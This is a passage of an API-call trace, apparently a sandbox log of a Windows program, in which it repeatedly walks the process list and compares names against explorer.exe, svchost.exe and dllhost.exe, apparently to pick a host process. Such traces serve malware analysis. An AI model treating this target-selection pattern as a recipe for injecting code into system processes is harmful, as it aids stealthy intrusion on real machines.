(hObject=0xd8) returned 1 [0240.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0240.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0240.944] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.944] CloseHandle (hObject=0xd8) returned 1 [0240.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0240.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0240.945] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.945] CloseHandle (hObject=0xd8) returned 1 [0240.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0240.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0240.945] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.945] CloseHandle (hObject=0xd8) returned 1 [0240.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0240.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0240.946] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.946] CloseHandle (hObject=0xd8) returned 1 [0240.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0240.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0240.947] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.947] CloseHandle (hObject=0xd8) returned 1 [0240.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0240.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0240.947] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.947] CloseHandle (hObject=0xd8) returned 1 [0240.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0240.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0240.948] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.948] CloseHandle (hObject=0xd8) returned 1 [0240.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0240.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0240.948] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.948] CloseHandle (hObject=0xd8) returned 1 [0240.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0240.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0240.949] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.949] CloseHandle (hObject=0xd8) returned 1 [0240.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0240.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0240.949] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.949] CloseHandle (hObject=0xd8) returned 1 [0240.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0240.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0240.950] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.950] CloseHandle (hObject=0xd8) returned 1 [0240.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0240.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0240.951] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.951] CloseHandle (hObject=0xd8) returned 1 [0240.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0240.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0240.951] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.951] CloseHandle (hObject=0xd8) returned 1 [0240.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0240.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0240.952] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.952] CloseHandle (hObject=0xd8) returned 1 [0240.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0240.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0240.952] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.953] CloseHandle (hObject=0xd8) returned 1 [0240.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0240.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0240.953] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.953] CloseHandle (hObject=0xd8) returned 1 [0240.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0240.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0240.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.954] CloseHandle (hObject=0xd8) returned 1 [0240.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0240.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0240.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.954] CloseHandle (hObject=0xd8) returned 1 [0240.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0240.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0240.955] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.955] CloseHandle (hObject=0xd8) returned 1 [0240.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0240.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0240.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0240.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0240.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0240.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0240.958] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.958] CloseHandle (hObject=0xd8) returned 1 [0240.958] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0240.958] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0240.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.959] CloseHandle (hObject=0xd8) returned 1 [0240.959] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0240.959] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0240.959] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0240.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0240.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0240.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.960] CloseHandle (hObject=0xd8) returned 1 [0240.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0240.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.960] CloseHandle (hObject=0xd8) returned 1 [0240.960] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0240.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0240.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.961] CloseHandle (hObject=0xd8) returned 1 [0240.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0240.962] CloseHandle (hObject=0xd4) returned 1 [0240.962] Sleep (dwMilliseconds=0x3e8) [0241.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0241.967] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0241.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0241.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0241.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0241.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0241.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0241.970] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0241.970] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0241.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0241.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0241.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0241.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0241.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0241.973] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0241.973] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0241.974] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0241.974] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0241.975] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0241.975] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0241.976] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0241.976] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.976] CloseHandle (hObject=0xd8) returned 1 [0241.977] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0241.977] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0241.977] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0241.977] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0241.977] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0241.978] IsWow64Process (in: hProcess=0xd8, 